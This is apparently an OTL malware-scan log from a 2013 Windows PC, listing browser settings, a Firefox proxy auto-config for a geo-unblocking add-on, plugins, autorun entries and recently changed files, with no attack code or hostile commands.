 
 ========== Internet Explorer ==========

 

IE:64bit: - HKLM\..\SearchScopes,DefaultScope = 

IE:64bit: - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = hxxp://www.bing.com/search?q={searchTerms}&FORM=IE8SRC

IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm

IE - HKLM\..\SearchScopes,DefaultScope = 

IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = hxxp://www.bing.com/search?q={searchTerms}&FORM=IE8SRC

 

 

IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

 

IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

 

IE - HKU\S-1-5-19\..\SearchScopes,DefaultScope = 

 

IE - HKU\S-1-5-20\..\SearchScopes,DefaultScope = 

 

IE - HKU\S-1-5-21-472337326-3317163276-3011696562-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = about:blank

IE - HKU\S-1-5-21-472337326-3317163276-3011696562-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = de-DE

IE - HKU\S-1-5-21-472337326-3317163276-3011696562-1000\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 70 7A D7 B7 BB B6 CD 01  [binary data]

IE - HKU\S-1-5-21-472337326-3317163276-3011696562-1000\..\SearchScopes,DefaultScope = {0633EE93-D776-472f-A0FF-E1416B8B2E3A}

IE - HKU\S-1-5-21-472337326-3317163276-3011696562-1000\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = hxxp://www.bing.com/search?q={searchTerms}&src=IE-SearchBox&FORM=IE10SR

IE - HKU\S-1-5-21-472337326-3317163276-3011696562-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-21-472337326-3317163276-3011696562-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = *.local

IE - HKU\S-1-5-21-472337326-3317163276-3011696562-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyServer" = 127.0.0.1:80

 
 ========== FireFox ==========

 

FF - prefs.js..browser.search.selectedEngine: "eBay"

FF - prefs.js..browser.startup.homepage: "hxxp://www.google.de/ig"

FF - prefs.js..extensions.enabledAddons: %7BD4DD63FA-01E4-46a7-B6B1-EDAB7D6AD389%7D:0.9.10

FF - prefs.js..extensions.enabledAddons: %7B972ce4c6-7e08-4474-a285-3208198ce6fd%7D:21.0

FF - prefs.js..network.proxy.autoconfig_url: "data:text/javascript,function%20FindProxyForURL(url%2C%20host)%20%7Bif%20(host%20%3D%3D%20'www.pandora.com'%20%7C%7C%20url.indexOf('southparkstudios.com')%20!%3D%20-1%20%7C%7C%20host%20%3D%3D%20's.hulu.com'%20%7C%7C%20shExpMatch(url%2C%20'http%3A%2F%2Fwww.funimation.com*')%20%7C%7C%20shExpMatch(url%2C%20'https%3A%2F%2Fsecure.funimation.com*')%20%7C%7C%20shExpMatch(url%2C%20'http%3A%2F%2Fwww.iheart.com*')%20%7C%7C%20(url.indexOf('proxmate%3Dactive')%20!%3D%20-1%20%26%26%20url.indexOf('amazonaws.com')%20%3D%3D%20-1)%20%7C%7C%20(url.indexOf('proxmate%3Dus')%20!%3D%20-1)%20%7C%7C%20shExpMatch(url%2C%20'http%3A%2F%2Fsongza.com*')%20%7C%7C%20url.indexOf('discoverymedia.com')%20!%3D%20-1%20%7C%7C%20(url.indexOf('turntable.fm')%20!%3D%20-1%20%26%26%20url.indexOf('static.turntable.fm')%20%3D%3D%20-1%20%26%26%20url.indexOf('s3.amazonaws.com')%20%3D%3D%20-1%20%26%26%20url.indexOf('ping.chartbeat.net')%20%3D%3D%20-1)%20%7C%7C%20url.indexOf('vevo.com')%20!%3D%20-1%20%7C%7C%20shExpMatch(url%2C%20'http%3A%2F%2Fgrooveshark.com*')%20%7C%7C%20shExpMatch(url%2C%20'http%3A%2F%2Fretro.grooveshark.com*')%20%7C%7C%20shExpMatch(url%2C%20'http%3A%2F%2Fwww.mtv.com*')%20%7C%7C%20shExpMatch(url%2C%20'http%3A%2F%2Fmedia.mtvnservices.com*')%20%7C%7C%20url.indexOf('play.google.com')%20!%3D%20-1%20%7C%7C%20shExpMatch(url%2C%20'http%3A%2F%2Fwww.crunchyroll.com*'))%20%7B%20return%20'PROXY%20ab-us13.personalitycores.com%3A8000%3B%20PROXY%20ab-us02.personalitycores.com%3A8000%3B%20PROXY%20ab-us07.personalitycores.com%3A8000%3B%20PROXY%20ab-us12.personalitycores.com%3A8000%3B%20PROXY%20ab-us11.personalitycores.com%3A8000%3B%20PROXY%20ab-us15.personalitycores.com%3A8000%3B%20PROXY%20ab-us01.personalitycores.com%3A8000%3B%20PROXY%20ab-us03.personalitycores.com%3A8000%3B%20PROXY%20ab-us14.personalitycores.com%3A8000%3B%20PROXY%20ab-us10.personalitycores.com%3A8000%3B%20PROXY%20ab-us08.personalitycores.com%3A8000%3B%20PROXY%20ab-us09.personalitycores.com%3A8000'%3B%7D%20%20else%20%7B%20return%20'DIRECT'%3B%20%7D%7D"

FF - prefs.js..network.proxy.backup.ftp: ""

FF - prefs.js..network.proxy.backup.ftp_port: ""

FF - prefs.js..network.proxy.backup.socks: ""

FF - prefs.js..network.proxy.backup.socks_port: ""

FF - prefs.js..network.proxy.backup.ssl: ""

FF - prefs.js..network.proxy.backup.ssl_port: ""

FF - user.js - File not found

 

FF:64bit: - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\system32\Macromed\Flash\NPSWF64_11_7_700_202.dll File not found

FF:64bit: - HKLM\Software\MozillaPlugins\@java.com/DTPlugin,version=10.9.2: C:\Windows\system32\npDeployJava1.dll (Oracle Corporation)

FF:64bit: - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.9.2: C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)

FF:64bit: - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: C:\Windows\system32\Wat\npWatWeb.dll (Microsoft Corporation)

FF:64bit: - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: C:\Program Files\Microsoft Silverlight\5.1.20125.0\npctrl.dll ( Microsoft Corporation)

FF - HKLM\Software\MozillaPlugins\@adobe.com/FlashPlayer: C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_7_700_202.dll ()

FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=:  File not found

FF - HKLM\Software\MozillaPlugins\@Apple.com/iTunes,version=1.0: C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll ()

FF - HKLM\Software\MozillaPlugins\@intel-webapi.intel.com/Intel WebAPI ipt;version=2.0.59: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)

FF - HKLM\Software\MozillaPlugins\@intel-webapi.intel.com/Intel WebAPI updater: C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)

FF - HKLM\Software\MozillaPlugins\@java.com/JavaPlugin,version=10.21.2: C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)

FF - HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE: C:\Windows\system32\Wat\npWatWeb.dll (Microsoft Corporation)

FF - HKLM\Software\MozillaPlugins\@Microsoft.com/NpCtrl,version=1.0: C:\Program Files (x86)\Microsoft Silverlight\5.1.20125.0\npctrl.dll ( Microsoft Corporation)

FF - HKLM\Software\MozillaPlugins\@nvidia.com/3DVision: C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll (NVIDIA Corporation)

FF - HKLM\Software\MozillaPlugins\@nvidia.com/3DVisionStreaming: C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll (NVIDIA Corporation)

FF - HKLM\Software\MozillaPlugins\@raidcall.en/RCplugin: d:\Users\Dani\AppData\Roaming\raidcall\plugins\nprcplugin.dll (Raidcall)

FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=3: C:\Program Files (x86)\Google\Update\1.3.21.145\npGoogleUpdate3.dll (Google Inc.)

FF - HKLM\Software\MozillaPlugins\@tools.google.com/Google Update;version=9: C:\Program Files (x86)\Google\Update\1.3.21.145\npGoogleUpdate3.dll (Google Inc.)

FF - HKLM\Software\MozillaPlugins\Adobe Reader: C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)

 

FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 21.0\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components

FF - HKEY_LOCAL_MACHINE\software\mozilla\Mozilla Firefox 21.0\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins [2013.06.05 20:31:46 | 000,000,000 | ---D | M]

FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 21.0\extensions\\Components: C:\Program Files (x86)\Mozilla Firefox\components

FF - HKEY_CURRENT_USER\software\mozilla\Mozilla Firefox 21.0\extensions\\Plugins: C:\Program Files (x86)\Mozilla Firefox\plugins [2013.06.05 20:31:46 | 000,000,000 | ---D | M]

 

[2012.08.10 00:15:18 | 000,000,000 | ---D | M] (No name found) -- d:\Users\Dani\AppData\Roaming\mozilla\Extensions

[2013.06.06 00:31:56 | 000,000,000 | ---D | M] (No name found) -- d:\Users\Dani\AppData\Roaming\mozilla\Firefox\Profiles\7qmo9taz.default\extensions

[2013.05.08 21:00:25 | 000,870,680 | ---- | M] () (No name found) -- d:\Users\Dani\AppData\Roaming\mozilla\firefox\profiles\7qmo9taz.default\extensions\{d10d0bf8-f5b5-c8b4-a8b2-2b9879e08c5d}.xpi

[2012.08.24 16:37:16 | 000,434,392 | ---- | M] () (No name found) -- d:\Users\Dani\AppData\Roaming\mozilla\firefox\profiles\7qmo9taz.default\extensions\{D4DD63FA-01E4-46a7-B6B1-EDAB7D6AD389}.xpi

[2013.05.23 18:35:24 | 000,000,000 | ---D | M] (No name found) -- C:\Program Files (x86)\mozilla firefox\browser\extensions

[2013.05.23 18:35:24 | 000,000,000 | ---D | M] (Default) -- C:\Program Files (x86)\mozilla firefox\browser\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}

 
 ========== Chrome  ==========

 

CHR - default_search_provider: Google (Enabled)

CHR - default_search_provider: search_url = {google:baseURL}search?q={searchTerms}&{google:RLZ}{google:originalQueryForSuggestion}{google:assistedQueryStats}{google:searchFieldtrialParameter}{google:searchClient}{google:sourceId}{google:instantExtendedEnabledParameter}ie={inputEncoding}

CHR - default_search_provider: suggest_url = {google:baseSuggestURL}search?{google:searchFieldtrialParameter}client=chrome&q={searchTerms}&{google:cursorPosition}sugkey={google:suggestAPIKeyParameter}

CHR - plugin: Shockwave Flash (Enabled) = C:\Program Files (x86)\Google\Chrome\Application\27.0.1453.110\PepperFlash\pepflashplayer.dll

CHR - plugin: Chrome Remote Desktop Viewer (Enabled) = internal-remoting-viewer

CHR - plugin: Native Client (Enabled) = C:\Program Files (x86)\Google\Chrome\Application\27.0.1453.110\ppGoogleNaClPluginChrome.dll

CHR - plugin: Chrome PDF Viewer (Enabled) = C:\Program Files (x86)\Google\Chrome\Application\27.0.1453.110\pdf.dll

CHR - plugin: Adobe Acrobat (Enabled) = C:\Program Files (x86)\Adobe\Reader 11.0\Reader\Browser\nppdf32.dll

CHR - plugin: Google Update (Enabled) = C:\Program Files (x86)\Google\Update\1.3.21.145\npGoogleUpdate3.dll

CHR - plugin: Intel\u00AE Identity Protection Technology (Enabled) = C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll

CHR - plugin: Intel\u00AE Identity Protection Technology (Enabled) = C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll

CHR - plugin: Java(TM) Platform SE 7 U21 (Enabled) = C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll

CHR - plugin: Silverlight Plug-In (Enabled) = C:\Program Files (x86)\Microsoft Silverlight\5.1.20125.0\npctrl.dll

CHR - plugin: NVIDIA 3D Vision (Enabled) = C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll

CHR - plugin: NVIDIA 3D VISION (Enabled) = C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll

CHR - plugin: iTunes Application Detector (Enabled) = C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll

CHR - plugin: Shockwave Flash (Enabled) = C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_11_7_700_202.dll

CHR - plugin: Windows Activation Technologies (Enabled) = C:\Windows\system32\Wat\npWatWeb.dll

CHR - plugin: Raidcall plugin (Enabled) = d:\Users\Dani\AppData\Roaming\raidcall\plugins\nprcplugin.dll

CHR - Extension: Google Docs = d:\Users\Dani\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.0.0.6_0\

CHR - Extension: Google Docs = d:\Users\Dani\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake\0.5_0\

CHR - Extension: Google Drive = d:\Users\Dani\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.2_0\

CHR - Extension: Google Drive = d:\Users\Dani\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf\6.3_0\

CHR - Extension: YouTube = d:\Users\Dani\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.5_0\

CHR - Extension: YouTube = d:\Users\Dani\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.6_0\

CHR - Extension: Google-Suche = d:\Users\Dani\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.19_0\

CHR - Extension: Google-Suche = d:\Users\Dani\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf\0.0.0.20_0\

CHR - Extension: Google Mail = d:\Users\Dani\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia\7_0\

 

O1 HOSTS File: ([2013.06.05 16:23:30 | 000,000,027 | ---- | M]) - C:\Windows\SysNative\drivers\etc\hosts

O1 - Hosts: 127.0.0.1       localhost

O2:64bit: - BHO: (Java(tm) Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Programme\Java\jre7\bin\ssv.dll (Oracle Corporation)

O2:64bit: - BHO: (Java(tm) Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Programme\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)

O2 - BHO: (Java(tm) Plug-In SSV Helper) - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files (x86)\Java\jre7\bin\ssv.dll (Oracle Corporation)

O2 - BHO: (Microsoft Web Test Recorder 10.0 Helper) - {876d9f09-c6d6-4324-a2cc-04dd9a4de12f} - C:\Program Files (x86)\Microsoft Visual Studio 11.0\Common7\IDE\PrivateAssemblies\Microsoft.VisualStudio.QualityTools.RecorderBarBHO100.dll (Microsoft Corporation)

O2 - BHO: (Java(tm) Plug-In 2 SSV Helper) - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files (x86)\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)

O4:64bit: - HKLM..\Run: [MSC] C:\Program Files\Microsoft Security Client\msseces.exe (Microsoft Corporation)

O4:64bit: - HKLM..\Run: [RtHDVCpl] C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe (Realtek Semiconductor)

O4 - HKLM..\Run: [AdobeCS4ServiceManager] C:\Program Files (x86)\Common Files\Adobe\CS4ServiceManager\CS4ServiceManager.exe (Adobe Systems Incorporated)

O4 - HKLM..\Run: [USB3MON] C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe (Intel Corporation)

O4 - HKU\S-1-5-21-472337326-3317163276-3011696562-1000..\Run: [DAEMON Tools Lite] C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe (Disc Soft Ltd)

O4 - HKU\S-1-5-21-472337326-3317163276-3011696562-1000..\Run: [GoogleDriveSync] C:\Program Files (x86)\Google\Drive\googledrivesync.exe (Google)

O4 - HKU\S-1-5-21-472337326-3317163276-3011696562-1000..\Run: [NetLimiter] C:\Program Files\NetLimiter 3\NLClientApp.exe (Locktime Software)

O6 - HKLM\Software\Policies\Microsoft\Internet Explorer\Restrictions present

O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0

O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorAdmin = 5

O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: ConsentPromptBehaviorUser = 3

O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: EnableSecureUIAPath = 1

O7 - HKU\.DEFAULT\Software\Policies\Microsoft\Internet Explorer\Control Panel present

O7 - HKU\S-1-5-18\Software\Policies\Microsoft\Internet Explorer\Control Panel present

O7 - HKU\S-1-5-19\Software\Policies\Microsoft\Internet Explorer\Control Panel present

O7 - HKU\S-1-5-20\Software\Policies\Microsoft\Internet Explorer\Control Panel present

O7 - HKU\S-1-5-21-472337326-3317163276-3011696562-1000\Software\Policies\Microsoft\Internet Explorer\Control Panel present

O7 - HKU\S-1-5-21-472337326-3317163276-3011696562-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer: NoDrives = 0

O10:64bit: - NameSpace_Catalog5\Catalog_Entries64\000000000007 [] - C:\Programme\Bonjour\mdnsNSP.dll (Apple Inc.)

O10 - NameSpace_Catalog5\Catalog_Entries\000000000007 [] - C:\Program Files (x86)\Bonjour\mdnsNSP.dll (Apple Inc.)

O13 - gopher Prefix: missing

O15 - HKU\S-1-5-21-472337326-3317163276-3011696562-1000\..Trusted Domains: line6.net ([]* in Trusted sites)

O17 - HKLM\System\CCS\Services\Tcpip\Parameters: DhcpNameServer = 88.208.58.166 192.168.1.1

O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{35ABAE31-17B1-48E1-A4F7-A319F6F08AF3}: DhcpNameServer = 192.168.1.1

O17 - HKLM\System\CCS\Services\Tcpip\Parameters\Interfaces\{F9DE9B3B-D6F4-44C4-9ABA-AE230A8CDF98}: DhcpNameServer = 88.208.58.166 192.168.1.1

O20:64bit: - HKLM Winlogon: Shell - (Explorer.exe) - C:\Windows\explorer.exe (Microsoft Corporation)

O20:64bit: - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysNative\userinit.exe (Microsoft Corporation)

O20 - HKLM Winlogon: Shell - (explorer.exe) - C:\Windows\SysWow64\explorer.exe (Microsoft Corporation)

O20 - HKLM Winlogon: UserInit - (C:\Windows\system32\userinit.exe) - C:\Windows\SysWOW64\userinit.exe (Microsoft Corporation)

O21:64bit: - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.

O21 - SSODL: WebCheck - {E6FB5E20-DE35-11CF-9C87-00AA005127ED} - No CLSID value found.

O32 - HKLM CDRom: AutoRun - 1

O32 - AutoRun File - [2010.07.10 06:33:52 | 000,000,000 | R--D | M] - E:\autorun -- [ NTFS ]

O34 - HKLM BootExecute: (autocheck autochk *)

O35:64bit: - HKLM\..comfile [open] -- "%1" %*

O35:64bit: - HKLM\..exefile [open] -- "%1" %*

O35 - HKLM\..comfile [open] -- "%1" %*

O35 - HKLM\..exefile [open] -- "%1" %*

O37:64bit: - HKLM\...com [@ = comfile] -- "%1" %*

O37:64bit: - HKLM\...exe [@ = exefile] -- "%1" %*

O37 - HKLM\...com [@ = comfile] -- "%1" %*

O37 - HKLM\...exe [@ = exefile] -- "%1" %*

O38 - SubSystems\\Windows: (ServerDll=winsrv:UserServerDllInitialization,3)

O38 - SubSystems\\Windows: (ServerDll=winsrv:ConServerDllInitialization,2)

O38 - SubSystems\\Windows: (ServerDll=sxssrv,4)

 
 ========== Files/Folders - Created Within 30 Days ==========

 

[2013.06.11 15:17:09 | 000,602,112 | ---- | C] (OldTimer Tools) -- d:\Users\Dani\Desktop\OTL.exe

[2013.06.06 00:34:57 | 000,000,000 | -HSD | C] -- C:\$RECYCLE.BIN

[2013.06.05 23:34:26 | 000,000,000 | ---D | C] -- C:\Windows\ERUNT

[2013.06.05 16:22:31 | 000,000,000 | ---D | C] -- C:\Windows\temp

[2013.06.05 16:18:29 | 000,000,000 | ---D | C] -- C:\Windows\erdnt

[2013.06.04 17:59:25 | 000,000,000 | ---D | C] -- d:\ProgramData\Spybot - Search & Destroy

[2013.05.23 18:42:22 | 000,000,000 | ---D | C] -- d:\Users\Dani\Desktop\Heroes of Umbra

[2013.05.23 18:35:07 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Mozilla Firefox

[2013.05.22 23:09:24 | 000,000,000 | ---D | C] -- d:\Users\Dani\Desktop\gdx-texturepacker-3.2.0

[2013.05.19 17:09:43 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Common Files\BattlEye

[2013.05.19 17:02:46 | 000,000,000 | ---D | C] -- d:\ProgramData\Bohemia Interactive Studio

[2013.05.19 16:43:25 | 000,000,000 | ---D | C] -- d:\Users\Dani\AppData\Local\DayZCommander

[2013.05.19 16:43:19 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Dotjosh Studios

[2013.05.19 16:33:35 | 000,000,000 | ---D | C] -- d:\Users\Dani\AppData\Local\ArmA 2 OA

[2013.05.19 16:32:22 | 000,000,000 | ---D | C] -- d:\Users\Dani\Documents\ArmA 2

[2013.05.19 16:32:22 | 000,000,000 | ---D | C] -- d:\Users\Dani\AppData\Local\ArmA 2

[2013.05.19 16:32:17 | 000,000,000 | ---D | C] -- d:\Users\Dani\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Bohemia Interactive

[2013.05.18 18:12:50 | 000,000,000 | ---D | C] -- d:\Users\Dani\Desktop\6px

[2013.05.15 21:13:50 | 000,000,000 | ---D | C] -- d:\Users\Dani\AppData\Roaming\Malwarebytes

[2013.05.15 21:13:39 | 000,000,000 | ---D | C] -- d:\ProgramData\Malwarebytes

[2013.05.15 21:13:38 | 000,025,928 | ---- | C] (Malwarebytes Corporation) -- C:\Windows\SysNative\drivers\mbam.sys

[2013.05.15 21:13:38 | 000,000,000 | ---D | C] -- C:\Program Files (x86)\Malwarebytes' Anti-Malware

[2013.05.14 19:47:20 | 000,000,000 | ---D | C] -- d:\Users\Dani\Desktop\kryonet-2.20

 
 ========== Files - Modified Within 30 Days ==========

 

[2013.06.11 15:21:05 | 000,022,016 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0

[2013.06.11 15:21:05 | 000,022,016 | -H-- | M] () -- C:\Windows\SysNative\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0

[2013.06.11 15:18:58 | 001,620,612 | ---- | M] () -- C:\Windows\SysNative\PerfStringBackup.INI

[2013.06.11 15:18:58 | 000,699,416 | ---- | M] () -- C:\Windows\SysNative\perfh007.dat

[2013.06.11 15:18:58 | 000,654,254 | ---- | M] () -- C:\Windows\SysNative\perfh009.dat

[2013.06.11 15:18:58 | 000,149,556 | ---- | M] () -- C:\Windows\SysNative\perfc007.dat

[2013.06.11 15:18:58 | 000,122,126 | ---- | M] () -- C:\Windows\SysNative\perfc009.dat

[2013.06.11 15:17:11 | 000,602,112 | ---- | M] (OldTimer Tools) -- d:\Users\Dani\Desktop\OTL.exe

[2013.06.11 15:17:00 | 000,001,106 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineUA.job

[2013.06.11 15:13:36 | 000,001,102 | ---- | M] () -- C:\Windows\tasks\GoogleUpdateTaskMachineCore.job

[2013.06.11 15:13:04 | 000,067,584 | --S- | M] () -- C:\Windows\bootstat.dat

[2013.06.07 15:09:00 | 000,000,884 | ---- | M] () -- C:\Windows\tasks\Adobe Flash Player Updater.job

[2013.06.06 00:42:15 | 000,007,604 | ---- | M] () -- d:\Users\Dani\AppData\Local\Resmon.ResmonCfg

[2013.06.05 20:19:02 | 000,000,085 | ---- | M] () -- C:\Windows\wininit.ini

[2013.06.05 16:23:30 | 000,000,027 | ---- | M] () -- C:\Windows\SysNative\drivers\etc\hosts

[2013.06.04 18:03:55 | 000,448,539 | R--- | M] () -- C:\Windows\SysNative\drivers\etc\hosts.20130604-191031.backup

[2013.05.23 18:44:01 | 000,005,906 | ---- | M] () -- d:\Users\Dani\Desktop\grasfield.png

[2013.05.23 18:44:01 | 000,001,390 | ---- | M] () -- d:\Users\Dani\Desktop\grasfield.pack

[2013.05.22 23:07:35 | 007,465,366 | ---- | M] () -- d:\Users\Dani\Desktop\gdx-texturepacker-3.2.0.zip

[2013.05.22 17:55:02 | 007,810,128 | ---- | M] () -- d:\Users\Dani\Desktop\Silverstein - Smashed Into Pieces (2013).mp3

[2013.05.21 20:25:10 | 003,147,197 | ---- | M] () -- d:\Users\Dani\Desktop\Element Eighty - Broken Promises.mp3

[2013.05.21 15:26:46 | 000,000,219 | ---- | M] () -- d:\Users\Dani\Desktop\Dota 2.url

[2013.05.21 01:09:04 | 000,025,185 | ---- | M] () -- C:\Windows\SysWow64\ieuinit.inf

[2013.05.21 01:09:03 | 000,025,185 | ---- | M] () -- C:\Windows\SysNative\ieuinit.inf

[2013.05.21 01:06:16 | 001,593,956 | ---- | M] () -- C:\Windows\SysWow64\PerfStringBackup.INI

[2013.05.20 14:14:10 | 000,047,198 | ---- | M] () -- d:\Users\Dani\Desktop\Kurzfassung.zip

[2013.05.19 03:23:43 | 002,895,824 | ---- | M] () -- C:\Windows\SysNative\FNTCACHE.DAT

[2013.05.18 02:10:32 | 009,514,359 | ---- | M] () -- d:\Users\Dani\Desktop\hiero.jar

[2013.05.16 20:58:49 | 017,698,934 | ---- | M] () -- d:\Users\Dani\Desktop\Medienprojekt_Backup.zip

[2013.05.14 19:39:38 | 002,005,341 | ---- | M] () -- d:\Users\Dani\Desktop\kryonet-2.20.zip

 
 ========== Files Created - No Company Name ==========

 

[2013.06.05 20:19:00 | 000,000,085 | ---- | C] () -- C:\Windows\wininit.ini

[2013.05.23 18:44:01 | 000,005,906 | ---- | C] () -- d:\Users\Dani\Desktop\grasfield.png

[2013.05.23 18:44:01 | 000,001,390 | ---- | C] () -- d:\Users\Dani\Desktop\grasfield.pack

[2013.05.22 23:07:24 | 007,465,366 | ---- | C] () -- d:\Users\Dani\Desktop\gdx-texturepacker-3.2.0.zip

[2013.05.22 17:54:57 | 007,810,128 | ---- | C] () -- d:\Users\Dani\Desktop\Silverstein - Smashed Into Pieces (2013).mp3

[2013.05.21 20:25:10 | 003,147,197 | ---- | C] () -- d:\Users\Dani\Desktop\Element Eighty - Broken Promises.mp3

[2013.05.21 15:26:46 | 000,000,219 | ---- | C] () -- d:\Users\Dani\Desktop\Dota 2.url

[2013.05.21 01:09:04 | 000,025,185 | ---- | C] () -- C:\Windows\SysWow64\ieuinit.inf

[2013.05.21 01:09:03 | 000,025,185 | ---- | C] () -- C:\Windows\SysNative\ieuinit.inf

[2013.05.20 14:14:01 | 000,047,198 | ---- | C] () -- d:\Users\Dani\Desktop\Kurzfassung.zip

[2013.05.18 02:10:17 | 009,514,359 | ---- | C] () -- d:\Users\Dani\Desktop\hiero.jar

[2013.05.14 19:39:36 | 002,005,341 | ---- | C] () -- d:\Users\Dani\Desktop\kryonet-2.20.zip

[2013.04.23 21:24:06 | 000,000,056 | ---- | C] () -- d:\Users\Dani\.gitconfig

[2013.02.28 07:07:15 | 000,000,000 | ---- | C] () -- d:\Users\Dani\__ng3d.lock

[2012.11.20 01:56:54 | 000,000,218 | ---- | C] () -- d:\Users\Dani\.recently-used.xbel

[2012.11.03 01:13:59 | 000,007,604 | ---- | C] () -- d:\Users\Dani\AppData\Local\Resmon.ResmonCfg

[2012.08.27 14:30:06 | 000,000,262 | ---- | C] () -- C:\Windows\{EEB3F6BB-318D-4CE5-989F-8191FCBFB578}_WiseFW.ini

[2012.08.12 03:08:58 | 000,003,072 | ---- | C] () -- d:\Users\Dani\AppData\Local\file__0.localstorage

[2012.08.10 00:46:52 | 001,593,956 | ---- | C] () -- C:\Windows\SysWow64\PerfStringBackup.INI

[2012.08.10 00:10:00 | 000,014,119 | ---- | C] () -- C:\Windows\SysWow64\RaCoInst.dat

[2012.08.10 00:09:18 | 000,792,416 | ---- | C] () -- C:\Windows\SysWow64\DiagFunc.dll

[2012.08.10 00:09:18 | 000,000,451 | ---- | C] () -- C:\Windows\SysWow64\DiagFunc.ini

[2012.05.10 16:35:16 | 000,029,184 | ---- | C] () -- C:\Windows\SysWow64\kdbsdk32.dll

[2012.04.20 13:59:44 | 000,001,536 | ---- | C] () -- C:\Windows\SysWow64\IusEventLog.dll

 
 ========== ZeroAccess Check ==========

 

[2009.07.14 06:55:00 | 000,000,227 | RHS- | M] () -- C:\Windows\assembly\Desktop.ini

